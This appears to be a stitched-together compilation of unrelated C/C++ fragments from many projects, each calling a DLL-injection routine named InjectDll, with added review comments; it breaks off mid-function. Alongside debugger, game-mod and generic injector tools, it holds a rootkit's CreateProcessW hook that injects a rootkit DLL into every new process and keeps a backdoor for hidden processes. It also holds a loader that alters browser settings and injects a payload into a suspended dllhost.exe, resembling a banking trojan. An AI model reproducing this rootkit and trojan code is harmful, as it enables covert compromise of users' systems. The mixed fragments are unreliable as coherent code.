// Injects or ejects a DLL into a single target named on the command line.
//
// szProc is either a string of decimal digits (taken as a PID) or an image
// name matched case-insensitively against the szExeFile of every entry in a
// Toolhelp snapshot. nMode == INJECTION_MODE selects InjectDll(), anything
// else EjectDll(); szDllPath is passed straight through to them.
//
// Returns FALSE only when CreateToolhelp32Snapshot() fails. The result of the
// InjectDll()/EjectDll() calls themselves is not propagated.
BOOL InjectDllToOne(LPCTSTR szProc, int nMode, LPCTSTR szDllPath)
{
    const int nLen = (int)_tcslen(szProc);

    // An all-digit string (including the empty string) is treated as a PID.
    BOOL bIsPid = TRUE;
    for (int idx = 0; idx < nLen; idx++)
    {
        if (!_istdigit(szProc[idx]))
        {
            bIsPid = FALSE;
            break;
        }
    }

    if (bIsPid)
    {
        const DWORD dwTarget = (DWORD)_tstol(szProc);
        if (nMode == INJECTION_MODE)
            InjectDll(dwTarget, szDllPath);
        else
            EjectDll(dwTarget, szDllPath);
        return TRUE;
    }

    // Image name: walk the process snapshot.
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(PROCESSENTRY32);
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
    if (hSnapShot == INVALID_HANDLE_VALUE)
    {
        _tprintf(L"InjectDllToOne() : CreateToolhelp32Snapshot() failed!!! [%d]", GetLastError());
        return FALSE;
    }

    BOOL bMore = Process32First(hSnapShot, &pe);
    while (bMore)
    {
        const DWORD dwTarget = pe.th32ProcessID;
        // For system stability, processes with a PID below 100 are left alone.
        if (dwTarget >= 100 && !_tcsicmp(pe.szExeFile, szProc))
        {
            if (nMode == INJECTION_MODE)
                InjectDll(dwTarget, szDllPath);
            else
                EjectDll(dwTarget, szDllPath);
        }
        bMore = Process32Next(hSnapShot, &pe);
    }

    CloseHandle(hSnapShot);
    return TRUE;
}
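// Injects (nMode == INJECTION_MODE) or ejects szDllPath into every process in
// a Toolhelp snapshot, skipping PIDs below 100.
//
// Returns FALSE when the snapshot cannot be taken or contains no entries;
// previously an INVALID_HANDLE_VALUE snapshot was handed to Process32First()
// unchecked. The per-process InjectDll()/EjectDll() results are not
// propagated.
BOOL InjectAllProcess(int nMode, LPCTSTR szDllPath)
{
    DWORD dwPID = 0;
    HANDLE hSnapShot = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 pe;

    // Get the snapshot of the system
    pe.dwSize = sizeof( PROCESSENTRY32 );
    hSnapShot = CreateToolhelp32Snapshot( TH32CS_SNAPALL, NULL );
    if( hSnapShot == INVALID_HANDLE_VALUE )
    {
        _tprintf(L"InjectAllProcess() : CreateToolhelp32Snapshot() failed!!! [%d]", GetLastError());
        return FALSE;
    }

    // find process
    if( !Process32First(hSnapShot, &pe) )
    {
        CloseHandle(hSnapShot);
        return FALSE;
    }

    do
    {
        dwPID = pe.th32ProcessID;

        // For system stability, DLL injection is not performed on system
        // processes whose PID is below 100.
        if( dwPID < 100 )
            continue;

        if( nMode == INJECTION_MODE )
            InjectDll(dwPID, szDllPath);
        else
            EjectDll(dwPID, szDllPath);
    } while( Process32Next(hSnapShot, &pe) );

    CloseHandle(hSnapShot);

    return TRUE;
}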
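/*============================================================================
 * windows MAIN
 *
 * Expects the target PID as the first command-line argument. argv[0] is the
 * program's own path and argc is always at least 1, so the previous
 * `argc > 0` / `argv[0]` form never reached the "no argument" branch and
 * always converted the program name (to 0). Returns InjectDll()'s result, or
 * ERROR_INVALID_PARAMETER when no PID argument was supplied.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    if( argc > 1 )
    {
        return (int)InjectDll( (DWORD)_wtoi( argv[ 1 ] ) );
    }

    return ERROR_INVALID_PARAMETER;
}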
/**************************************
 * Inject code into a remote process. *
 **************************************/
// Dispatches to InjectDll() when built with INJECT_DLL, otherwise to
// InjectCode(); the callee's result is folded to a BOOL (non-zero == TRUE).
BOOL Inject()
{
    BOOL bOk = FALSE;
#ifdef INJECT_DLL
    if (InjectDll() != 0)
        bOk = TRUE;
#else
    if (InjectCode() != 0)
        bOk = TRUE;
#endif
    return bOk;
}
// Brings up the debugging backend inside process m_processId: refuses a
// process that GetIsBeingDebugged() reports as already hooked, creates the
// per-PID event and command channels, loads LuaInject.dll into the target via
// InjectDll(), waits for the backend to connect, runs ProcessInitialization()
// and finally starts the event-reader thread.
//
// @param symbolsDirectory forwarded unchanged to ProcessInitialization().
// @return false on any failed step (hook, injection and initialisation
//         failures raise a MessageEvent(); channel-creation failures return
//         silently); true once the event thread has been requested.
bool DebugFrontend::InitializeBackend(const char* symbolsDirectory)
{
    if (GetIsBeingDebugged(m_processId))
    {
        MessageEvent("Error: The process cannot be debugged because it contains hooks from a previous session", MessageType_Error);
        return false;
    }

    // Channel names embed the PID in hex; "Decoda.Event.%x" is at most 13 +
    // 8 characters, so the 256-byte buffers cannot be truncated.
    char eventChannelName[256];
    _snprintf(eventChannelName, 256, "Decoda.Event.%x", m_processId);

    char commandChannelName[256];
    _snprintf(commandChannelName, 256, "Decoda.Command.%x", m_processId);

    // Setup communication channel with the process that is used to receive events
    // back to the frontend.
    if (!m_eventChannel.Create(eventChannelName))
    {
        return false;
    }

    // Setup communication channel with the process that is used to send commands
    // to the backend.
    if (!m_commandChannel.Create(commandChannelName))
    {
        return false;
    }

    // Inject our debugger DLL into the process so that we can monitor from
    // inside the process's memory space.
    if (!InjectDll(m_processId, "LuaInject.dll"))
    {
        MessageEvent("Error: LuaInject.dll could not be loaded into the process", MessageType_Error);
        return false;
    }

    // Wait for the client to connect.
    // NOTE(review): no timeout is visible here; if the injected DLL never
    // connects this call presumably blocks indefinitely.
    m_eventChannel.WaitForConnection();

    // Read the initialization function from the event channel.
    if (!ProcessInitialization(symbolsDirectory))
    {
        MessageEvent("Error: Backend couldn't be initialized", MessageType_Error);
        return false;
    }

    m_state = State_Running;

    // Start a new thread to handle the incoming event channel.
    // NOTE(review): m_eventThread is not checked for NULL, so a CreateThread()
    // failure leaves m_state == State_Running with no reader thread. threadId
    // is only written, never read.
    DWORD threadId;
    m_eventThread = CreateThread(NULL, 0, StaticEventThreadProc, this, 0, &threadId);

    return true;
}
// Backdoor : if application name or command line contains RTK_FILE_CHAR
// the created process is *not* hooked.
// Useful to launch hidden process from windows gui/cmd.exe that performs
// a search before delegating the creation of the process to CreateProcess
// To launch a non hijacked process using cmd, do the following :
// run: cmd.exe
// type: cmd.exe _nti (where _nti is RTK_FILE_CHAR )
// then run your hidden program from the non hijacked shell
//
// Replacement for CreateProcessW installed by the hooking layer. Observable
// behaviour, in order: the real CreateProcessW is resolved lazily through
// fGetProcAddress; the child is always created CREATE_SUSPENDED (the caller's
// dwCreationFlags is discarded); if the ANSI copy of the command line or
// application name contains RTK_FILE_CHAR the child is released with
// WakeUpProcess(), otherwise it is handed to InjectDll() with kNTIDllPath;
// both handles in lpProcessInformation are then closed before returning, so
// the caller receives handle values that are no longer valid.
//
// @return the real CreateProcessW's result, or 0 if it could not be resolved.
BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
{
    int bResult, bInject=1;
    char msg[1024], cmdline[256], appname[256];   // msg is zeroed below but never used

    OutputString("[i] CreateProcessW()\n");

    // do not rely on info given by HijackApi() since we may have hijacked at GetProcAddress() level
    if(!fCreateProcessW)
    {
        fCreateProcessW = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"CreateProcessW");
        if(!fCreateProcessW)
            return 0;
    }

    my_memset(msg, 0, 1024);
    my_memset(cmdline, 0, 256);
    my_memset(appname, 0, 256);

    //Convert strings from unicode :
    // Buffers are pre-zeroed and the conversion is capped at 255 characters, so
    // they stay NUL-terminated; the RTK_FILE_CHAR tests below therefore only
    // see the first 255 characters of each string. A NULL source leaves the
    // corresponding buffer empty.
    WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpApplicationName, -1, appname, 255,NULL, NULL);
    WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpCommandLine, -1, cmdline, 255,NULL, NULL);

    OutputString("\n[!!] 
Hooked CreateProcessW : %s - %s, injecting rootkit (%s)...\n", (char*)appname, (char*)cmdline, (char*)kNTIDllPath);

    // The caller's dwCreationFlags is replaced outright: the child always
    // starts suspended so that it can be acted on before its first instruction.
    bResult = (int) fCreateProcessW((const unsigned short *)lpApplicationName, (unsigned short *)lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, CREATE_SUSPENDED /*dwCreationFlags*/, lpEnvironment, (const unsigned short *)lpCurrentDirectory, (struct _STARTUPINFOW *)lpStartupInfo, lpProcessInformation);

    // inject the created process if its name & command line doesn't contain RTK_FILE_CHAR
    if(bResult)
    {
        if(lpCommandLine)
        {
            if(strstr((char*)cmdline,(char*)RTK_FILE_CHAR)){
                OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
                WakeUpProcess(lpProcessInformation->dwProcessId);
                bInject = 0;
            }
        }

        // NOTE(review): when both strings carry the marker, WakeUpProcess()
        // is called twice for the same PID.
        if(lpApplicationName)
        {
            if(strstr((char*)appname,(char*)RTK_FILE_CHAR))
            {
                OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
                WakeUpProcess(lpProcessInformation->dwProcessId);
                bInject = 0;
            }
        }

        // Whether InjectDll() resumes the suspended main thread is not visible
        // here; on this path nothing else resumes it.
        if(bInject)
            InjectDll(lpProcessInformation->hProcess, (char*)kNTIDllPath);

        // Closing the caller's handles here is an observable deviation from
        // the real CreateProcessW contract, which leaves them for the caller.
        CloseHandle(lpProcessInformation->hProcess);
        CloseHandle(lpProcessInformation->hThread);
    }

    return bResult;
}
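// Dispatch routine for the injection device. Create/close/read complete with
// success; a write delivers an INJECT_INFO through the IRP's MDL, which is
// validated, mapped with MmGetSystemAddressForMdlSafe() and passed to
// InjectDll(). Any other major function is rejected.
//
// @param DeviceObject unused.
// @param irp          the request; always completed here with IO_NO_INCREMENT.
// @return the status also stored in irp->IoStatus.Status.
NTSTATUS DriverDispatch(PDEVICE_OBJECT DeviceObject,PIRP irp)
{
    PIO_STACK_LOCATION io;
    PINJECT_INFO InjectInfo;
    NTSTATUS status;

    UNREFERENCED_PARAMETER(DeviceObject);

    io=IoGetCurrentIrpStackLocation(irp);
    irp->IoStatus.Information=0;

    switch(io->MajorFunction)
    {
    case IRP_MJ_CREATE:
    case IRP_MJ_CLOSE:
    case IRP_MJ_READ:
        status=STATUS_SUCCESS;
        break;

    case IRP_MJ_WRITE:
        // The buffer originates in user mode. A NULL MdlAddress would be
        // dereferenced by MmGetSystemAddressForMdlSafe, and an MDL shorter
        // than INJECT_INFO would be read past its end by InjectDll(); both
        // were previously unchecked, so refuse them before mapping.
        if(!irp->MdlAddress)
        {
            status=STATUS_INVALID_PARAMETER;
            break;
        }
        if(MmGetMdlByteCount(irp->MdlAddress) < sizeof(INJECT_INFO))
        {
            status=STATUS_BUFFER_TOO_SMALL;
            break;
        }

        InjectInfo=(PINJECT_INFO)MmGetSystemAddressForMdlSafe(irp->MdlAddress,NormalPagePriority);
        if(!InjectInfo)
        {
            status=STATUS_INSUFFICIENT_RESOURCES;
            break;
        }

        if(!InjectDll(InjectInfo))
        {
            status=STATUS_UNSUCCESSFUL;
            break;
        }

        status=STATUS_SUCCESS;
        irp->IoStatus.Information=sizeof(INJECT_INFO);
        break;

    default:
        status=STATUS_INVALID_DEVICE_REQUEST;
        break;
    }

    irp->IoStatus.Status=status;
    IoCompleteRequest(irp,IO_NO_INCREMENT);
    return status;
}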
// Command-line front end: `<program> pid dll_path`.
// Exit status 1 is used only for a wrong argument count; the InjectDll()
// outcome is printed but does not affect the exit status.
int _tmain(int argc,TCHAR *argv[])
{
    if (argc != 3)
    {
        _tprintf(L"USAGE:%s pid dll_path\n",argv[0]);
        return 1;
    }

    // inject dll
    const DWORD dwTargetPid = (DWORD)_tstol(argv[1]);
    LPCTSTR szDllPath = argv[2];

    if (!InjectDll(dwTargetPid, szDllPath))
    {
        _tprintf(L"InjectDll(\"%s\") failed!\n", szDllPath);
        return 0;
    }

    _tprintf(L"InjectDll(\"%s\") success!\n",szDllPath);
    return 0;
}
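// IOCTL dispatch routine. CTL_KEINJECTAPC delivers an INJECT_INFO in the
// IRP's SystemBuffer (so the control code is presumably METHOD_BUFFERED);
// the buffer is validated and passed to InjectDll(). Every other control
// code is rejected.
//
// @param DeviceObject unused.
// @param Irp          the request; always completed here with IO_NO_INCREMENT.
// @return the status also stored in Irp->IoStatus.Status.
NTSTATUS DriverDispatch(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
    PINJECT_INFO InjectInfo;
    NTSTATUS Status = STATUS_SUCCESS;
    PIO_STACK_LOCATION IrpSp;
    PVOID InputBuffer = NULL;
    ULONG_PTR InputSize = 0;
    ULONG_PTR IoControlCode = 0;

    UNREFERENCED_PARAMETER(DeviceObject);

    IrpSp = IoGetCurrentIrpStackLocation(Irp);
    InputBuffer = Irp->AssociatedIrp.SystemBuffer;
    InputSize = IrpSp->Parameters.DeviceIoControl.InputBufferLength;
    IoControlCode = IrpSp->Parameters.DeviceIoControl.IoControlCode;

    switch(IoControlCode)
    {
    case CTL_KEINJECTAPC:
        InjectInfo=(PINJECT_INFO)InputBuffer;
        if(!InjectInfo)
        {
            Status=STATUS_INSUFFICIENT_RESOURCES;
            break;
        }

        // The caller-supplied length was previously never compared with the
        // structure size, so a short user-mode buffer would be read past its
        // end by InjectDll().
        if(InputSize < sizeof(*InjectInfo))
        {
            Status=STATUS_BUFFER_TOO_SMALL;
            break;
        }

        if(!InjectDll(InjectInfo))
        {
            Status=STATUS_UNSUCCESSFUL;
            break;
        }

        Status=STATUS_SUCCESS;
        Irp->IoStatus.Information=0;
        break;

    default:
        Status=STATUS_INVALID_DEVICE_REQUEST;
        break;
    }

    Irp->IoStatus.Status=Status;
    IoCompleteRequest(Irp,IO_NO_INCREMENT);
    return Status;
}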
// command for inject button void CdllInjectDoc::InjectSelected(CListCtrl* lv, LPSTR szDllName) { POSITION pos = lv->GetFirstSelectedItemPosition(); int index = 0; TCHAR pid[21]; TCHAR cPid[21] = {0}; DWORD dwPid; while((index = lv->GetNextSelectedItem(pos)) != -1) { memcpy_s(pid, 21, cPid, 21); lv->GetItemText(index, 1, pid, 20); dwPid = _ttoi(pid); TCHAR exeFile[MAX_PATH]; lv->GetItemText(index, 0, exeFile, MAX_PATH); TCHAR line[260]; _stprintf_s(line, 260, _T("Injecting %s(%s)... "), exeFile, pid); writeLog(CString(line)); CString temp; temp.Append(exeFile); temp += _T("|"); temp.Append(pid); temp += _T("|"); int aa = pidInfo.Find(temp, 0); if (pidInfo.Find(temp, 0) != -1) { writeLog(CString("Already Injected.\r\n")); continue; } if (InjectDll(dwPid, szDllName) == TRUE) { writeLog(CString("SUCCEED.\r\n")); pidInfo += temp; } else writeLog(CString("FAILED.\r\n")); } }
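// Finds the game window by class/title, opens its process, loads
// TH15Render.dll (from this program's current directory) into it, waits for
// Enter, then unloads the DLL again.
//
// Exit codes: 1 window not found / process could not be opened, 2 injection
// failed, 3 unload failed, 0 success. The Chinese console strings are kept
// as written.
int _tmain(int argc, _TCHAR* argv[])
{
    // Raise privileges.
    EnablePrivilege(TRUE);

    // Open the process. (The title string is Japanese text exactly as it
    // appears in the source's encoding.)
    HWND hwnd = FindWindow(_T("BASE"), _T("搶曽嵁庫揱丂乣 Legacy of Lunatic Kingdom. ver 1.00b"));

    // GetWindowThreadProcessId() leaves *pid untouched when hwnd is NULL, so
    // the previous version passed an uninitialised PID to OpenProcess() when
    // the window was missing. Reject that case explicitly.
    DWORD pid = 0;
    if (hwnd == NULL || GetWindowThreadProcessId(hwnd, &pid) == 0 || pid == 0)
    {
        printf("打开进程失败,错误代码:%u\n", GetLastError());
        return 1;
    }

    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (process == NULL)
    {
        printf("打开进程失败,错误代码:%u\n", GetLastError());
        return 1;
    }

    // TH15Render.dll must be in this program's current directory; the
    // injection needs an absolute path.
    TCHAR dllPath[MAX_PATH];
    GetCurrentDirectory(_countof(dllPath), dllPath);
    _tcscat_s(dllPath, _T("\\TH15Render.dll"));

    // Inject the DLL.
    HMODULE remoteModule = InjectDll(process, dllPath);
    if (remoteModule == NULL)
    {
        CloseHandle(process);
        return 2;
    }

    // Pause until Enter is pressed.
    printf("按回车卸载DLL\n");
    getchar();

    // Unload the DLL.
    if (!FreeRemoteDll(process, remoteModule))
    {
        CloseHandle(process);
        return 3;
    }

    // Close the process handle.
    CloseHandle(process);
    return 0;
}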
// Command-line front end: InjectDll.exe <PID> <dllpath>.
// SE_DEBUG_NAME is enabled before the argument check (its result is ignored).
// The console messages are mis-encoded in the source and reproduced unchanged.
int main(int argc, char *argv[])
{
    SetPrivilege(SE_DEBUG_NAME, TRUE);

    // InjectDll.exe <PID> <dllpath>
    if( argc != 3 )
    {
        printf("Ó÷¨ : %s <½ø³ÌPID> <dll·¾¶>/n", argv[0]);
        return 1;
    }

    const DWORD targetPid = (DWORD)atoi(argv[1]);
    const char *dllPath = argv[2];

    if( InjectDll(targetPid, dllPath) )
    {
        printf("InjectDllµ÷Óóɹ¦£¡/n");
        return 0;
    }

    printf("InjectDllµ÷ÓÃʧ°Ü£¡/n");
    return 1;
}
// Command-line front end: InjectDll.exe <i|e> <PID> <dll_path>.
// Enables SE_DEBUG_NAME, then injects ("i") or ejects ("e"). Any other mode
// letter is silently ignored, and the InjectDll()/EjectDll() result is not
// reported; the exit status is 1 only for a wrong argument count.
int _tmain(int argc, TCHAR* argv[])
{
    if( argc != 4 )
    {
        usage();
        return 1;
    }

    // adjust privilege
    _EnableNTPrivilege(SE_DEBUG_NAME, SE_PRIVILEGE_ENABLED);

    // InjectDll.exe <i|e> <PID> <dll_path>
    LPCTSTR szMode = argv[1];
    const DWORD dwTargetPid = (DWORD)_tstoi(argv[2]);
    LPCTSTR szDllPath = argv[3];

    const BOOL bInject = (_tcsicmp(szMode, L"i") == 0);
    const BOOL bEject = !bInject && (_tcsicmp(szMode, L"e") == 0);

    if( bInject )
        InjectDll(dwTargetPid, szDllPath);
    else if( bEject )
        EjectDll(dwTargetPid, szDllPath);

    return 0;
}
// Entries that are never touched: [System Process] and System (PID below
// 100), smss.exe and csrss.exe.
static BOOL IsProtectedProcess(const PROCESSENTRY32* pe)
{
    if (pe->th32ProcessID < 100)
        return TRUE;
    if (!_tcsicmp(pe->szExeFile, L"smss.exe"))
        return TRUE;
    return !_tcsicmp(pe->szExeFile, L"csrss.exe") ? TRUE : FALSE;
}

// Injects (nMode == INJECTION_MODE) or ejects szDllPath into every process of
// a Toolhelp snapshot except the protected ones, which are reported on the
// console and skipped.
//
// Returns FALSE only when CreateToolhelp32Snapshot() fails; the per-process
// InjectDll()/EjectDll() results are not propagated.
BOOL InjectDllToAll(int nMode, LPCTSTR szDllPath)
{
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(PROCESSENTRY32);

    // Get the snapshot of the system
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
    if (hSnapShot == INVALID_HANDLE_VALUE)
    {
        _tprintf(L"InjectDllToAll() : CreateToolhelp32Snapshot() failed!!! [%d]", GetLastError());
        return FALSE;
    }

    LPCTSTR szModeName = (nMode == INJECTION_MODE) ? L"Injection" : L"Ejection";

    // find process
    BOOL bMore = Process32First(hSnapShot, &pe);
    while (bMore)
    {
        const DWORD dwTargetPid = pe.th32ProcessID;

        if (IsProtectedProcess(&pe))
        {
            _tprintf(L"%s(%d) => System Process... DLL %s is impossible!\n", pe.szExeFile, dwTargetPid, szModeName);
        }
        else if (nMode == INJECTION_MODE)
        {
            InjectDll(dwTargetPid, szDllPath);
        }
        else
        {
            EjectDll(dwTargetPid, szDllPath);
        }

        bMore = Process32Next(hSnapShot, &pe);
    }

    CloseHandle(hSnapShot);
    return TRUE;
}
// Writes the hard-coded path "C:\apilog\intruder.dll" (NUL included) into
// hProcess with VirtualAllocEx()/WriteProcessMemory() and hands the remote
// address to InjectDll(). The commented-out lines show an earlier variant
// that located intruder.dll next to the running module.
//
// @param hProcess target process handle used for the remote allocation/write.
// @param hThread  passed through to InjectDll(); not used here otherwise.
//
// Failures of VirtualAllocEx() or WriteProcessMemory() are silently ignored,
// and the remote allocation is never released by this function.
void KInject::Inject2(HANDLE hProcess, HANDLE hThread){
    // NOTE(review): WriteProcessMemory's last parameter is SIZE_T*; a DWORD*
    // only has the matching width on 32-bit builds.
    DWORD ret;
    char szDLL[MAX_PATH]; //Intruder.dll full path
    // GetModuleFileNameA(0, szDLL, MAX_PATH);
    // for(DWORD i=(DWORD)strlen(szDLL); i>0; i--){if(szDLL[i-1]=='\\'){szDLL[i]=0; break;}}
    // strcat(szDLL, "intruder.dll");
    strcpy(szDLL, "C:\\apilog\\intruder.dll");
    int len = strlen(szDLL) + 1;   // copy the terminating NUL as well

    PVOID param = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT | MEM_TOP_DOWN, PAGE_READWRITE);
    if (param != NULL)
    {
        if (WriteProcessMemory(hProcess, param, (LPVOID)szDLL, len, &ret))
        {
            // NOTE(review): the remote address is narrowed to DWORD, which
            // truncates pointers above 4 GiB on 64-bit builds.
            InjectDll(hProcess, hThread, (DWORD)param);
        }
    }
}
// Command-line front end: `<program> <pid> <dll_path>`.
// Exit status 1 for a wrong argument count or when SE_DEBUG_NAME cannot be
// enabled; the InjectDll() outcome is printed but the exit status is 0
// either way.
int _tmain(int argc, TCHAR *argv[])
{
    if( argc != 3)
    {
        _tprintf(L"USAGE : %s <pid> <dll_path>\n", argv[0]);
        return 1;
    }

    // change privilege
    const BOOL bPrivOk = SetPrivilege(SE_DEBUG_NAME, TRUE);
    if( !bPrivOk )
        return 1;

    // inject dll
    const DWORD dwTargetPid = (DWORD)_tstol(argv[1]);
    LPCTSTR szDllPath = argv[2];

    if( !InjectDll(dwTargetPid, szDllPath) )
    {
        _tprintf(L"InjectDll(\"%s\") failed!!!\n", szDllPath);
        return 0;
    }

    _tprintf(L"InjectDll(\"%s\") success!!!\n", szDllPath);
    return 0;
}
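// EnumWindows() callback. For lParam == INJECT_DLL, a window titled
// "Diablo II" whose owning executable is Game.exe is injected once
// (isInjected() guards repeats); any other lParam does nothing. Always returns
// TRUE so enumeration continues.
//
// Previously an empty path from getexepath() showed the error box and then
// fell through to the basename/Game.exe test; it now stops at the error.
//
// @param hwnd   window being enumerated.
// @param lParam action requested by the caller of EnumWindows().
// @return TRUE to keep enumerating.
BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
    switch (lParam)
    {
    case INJECT_DLL:
    {
        if (getwindowtext(hwnd) != "Diablo II")
            break;

        string path = getexepath(hwnd);
        if (path == "")
        {
            MessageBox(hwnd, str_to_wstr("Could not get Diablo II exe path.\n" + error_code_to_text(GetLastError())).c_str(), L"ERROR", MB_OK);
            break;
        }

        // Basename after the last backslash; the whole path when there is none
        // (same result the previous substr() arithmetic produced).
        const string::size_type slash = path.rfind("\\");
        const string exename = (slash == string::npos) ? path : path.substr(slash + 1);

        if (exename == "Game.exe" && !isInjected(hwnd))
        {
            if (!InjectDll(hwnd))
                MessageBox(hwnd, L"Injection failed", L"ERROR", MB_OK);
        }
        break;
    }
    }
    return TRUE;
}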
// Top-level driver of this module. In order: SetFirefoxPrefs(),
// DisableMultiProcessesAndProtectedModeIe() and InitPanelRequest() are run;
// GetDlls() fills mainPluginPe; the path <system dir><Strs::fileDiv><Strs::dllhostExe>
// is built; that executable is started CREATE_SUSPENDED and mainPluginPe is
// passed to InjectDll() together with the new process handle.
//
// The Funcs::p* members and Strs::* values appear to be indirected API
// pointers and strings resolved elsewhere — not visible here.
//
// NOTE(review): neither the pCreateProcessA result nor processInfo.hProcess is
// checked before InjectDll(), and the handles in processInfo are never closed
// in this function.
static void Run()
{
    SetFirefoxPrefs();
    DisableMultiProcessesAndProtectedModeIe();
    InitPanelRequest();

    BYTE *mainPluginPe = NULL;
    GetDlls(&mainPluginPe, NULL, FALSE);   // mainPluginPe is not NULL-checked afterwards

    // %SystemRoot%\system32 (CSIDL_SYSTEM) + separator + host executable name.
    char dllhostPath[MAX_PATH] = { 0 };
    Funcs::pSHGetFolderPathA(NULL, CSIDL_SYSTEM, NULL, 0, dllhostPath);
    Funcs::pLstrcatA(dllhostPath, Strs::fileDiv);
    Funcs::pLstrcatA(dllhostPath, Strs::dllhostExe);

    STARTUPINFOA startupInfo = { 0 };
    PROCESS_INFORMATION processInfo = { 0 };
    startupInfo.cb = sizeof(startupInfo);
    // The child is created suspended; nothing in this function resumes it.
    Funcs::pCreateProcessA(dllhostPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInfo);

    InjectDll(mainPluginPe, processInfo.hProcess, FALSE);
}
/*
  Function: InjectorDll

  Description: Main routine. Either creates the target process or attaches to
  an existing one, then has InjectDll() place in the loaded process's memory
  whatever is needed to load the given DLL. On any failure after a process was
  obtained, that process is terminated.

  Parameters:
    dll_name     - name/path of the DLL to load
    typeapp      - "-c" console, "-g" GUI, "-u" detect via GetTypeOfApp();
                   only consulted when program_name is given
    program_name - program to launch, or NULL to attach to `pid`
    pid          - PID to attach to when program_name is NULL

  Return:
    _ERROR__   - some step of the procedure failed
    _SUCCESS__ - the procedure completed

  NOTE(review): pinfo's handles are never closed by this function.
*/
int InjectorDll ( const char * dll_name, const char * typeapp, const char * program_name, DWORD pid )
{
    STARTUPINFO startup_info;
    PROCESS_INFORMATION pinfo;
    int return_function;
    char * debug_string;
    int type_of_app;
    DWORD create_flag;

    // Local variable initialisation
    ZeroMemory( & startup_info , sizeof(startup_info) );
    ZeroMemory( & pinfo, sizeof(pinfo) );
    startup_info.cb = sizeof(startup_info);
    return_function = _SUCCESS__;

    // Decide whether to launch the process or attach to an existing one
    if ( program_name == NULL )
    {
        // Attach to the already running process
        debug_string = "Open process";
        pinfo.hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid );
        if ( pinfo.hProcess == NULL )
        {
            printf( " [FAIL] - %s\n", debug_string );
            ShowGetLastErrorString( "InjectorDll:OpenProcess(pid)" );
            return _ERROR__;
        }
        else
        {
            printf( "\n [OK] - Procces Attached [%04d].\n", pid );
        }
    }
    else
    {
        // Show the program details
        ShowInjectorTask( program_name, dll_name );

        // Determine the program type
        if ( !strcmp( typeapp, "-c" ) ) type_of_app = _CONS_APP__;
        else if ( !strcmp( typeapp, "-g" ) ) type_of_app = _GUI_APP__;
        else if ( !strcmp( typeapp, "-u" ) ) type_of_app = GetTypeOfApp( ( LPTSTR ) program_name );
        else return _ERROR__;

        // NOTE(review): create_flag is only assigned in the console and GUI
        // branches; for _UNK_APP__ (or any other value from GetTypeOfApp())
        // it reaches CreateProcess() uninitialised.
        if ( type_of_app == _CONS_APP__ )
        {
            puts( " [OK] - CONSOLE." );
            create_flag = CREATE_SUSPENDED | CREATE_NEW_CONSOLE;
        }
        else if ( type_of_app == _GUI_APP__ )
        {
            puts( " [OK] - GUI" );
            create_flag = 0;
        }
        else if ( type_of_app == _UNK_APP__ )
            puts( " [OK] - UNKNOW" );

        // Create the process according to the exe type
        debug_string = "Create process";
        if ( CreateProcess ( NULL , (LPTSTR) program_name , NULL , NULL , FALSE , create_flag , NULL , NULL , & startup_info , & pinfo ) == 0 )
        {
            printf( " [FAIL] - %s\n", debug_string );
            ShowGetLastErrorString( "InjectorDll:CreateProcess(program_name)" );
            return _ERROR__;
        }

        // Show the created process's details
        printf ( " [OK] - %s:\n" " [INFO] PID: 0x%04X\n" " [INFO] P. HANDLE: 0x%08X\n" " [INFO] TID: 0x%04X\n" " [INFO] T. HANDLE: 0x%08X\n" , debug_string , pinfo.dwProcessId , pinfo.hProcess , pinfo.dwThreadId , pinfo.hThread );

        // Wait for the process to finish loading into memory and then suspend
        // its main thread so it can be worked on safely, in case it is a
        // windowed application. (WaitForInputIdle() returns 0 on success;
        // SuspendThread() returns (DWORD)-1 on failure.)
        if ( type_of_app == _GUI_APP__ )
        {
            debug_string = " Waiting for process load.";
            if ( WaitForInputIdle( pinfo.hProcess, INFINITE ) == 0 )
            {
                debug_string = "Suspension of remote main thread.";
                if ( SuspendThread( pinfo.hThread ) == -1 )
                {
                    printf( " [FAIL] - %s\n", debug_string );
                    ShowGetLastErrorString ( "InjectorDll:SuspendThread(_GUI_APP__)" );
                    return_function = _ERROR__;
                }
                else
                {
                    printf( " [OK] - %s.\n", debug_string );
                    // NOTE(review): `==` compares instead of assigning; this
                    // statement has no effect. Harmless here only because
                    // return_function is still _SUCCESS__ at this point.
                    return_function == _SUCCESS__;
                }
            }
            else
            {
                printf( " [ERROR] - %s\n", debug_string );
                ShowGetLastErrorString ( "InjectorDll:WaitForInputIdle(_GUI_APP__)" );
                return_function = _ERROR__;
            }
        }
    }

    // Prepare and inject the DLL load into the selected process
    if ( return_function == _SUCCESS__ )
    {
        puts( " [INFO] - Injecting DLL... 
" );
        debug_string = " DLL injected.";
        if ( InjectDll( pinfo.hProcess, dll_name ) == _SUCCESS__ )
        {
            printf( " [OK] - %s\n", debug_string );
        }
        else
        {
            printf( " [FAIL] - %s\n", debug_string );
            return_function = _ERROR__;
        }
    }

    // Handle errors: if anything went wrong, terminate the remote process.
    // On the attach path this kills the pre-existing process identified by
    // `pid`, not one created here.
    if ( return_function == _ERROR__ )
    {
        debug_string = " Remote process ended due to an error.";
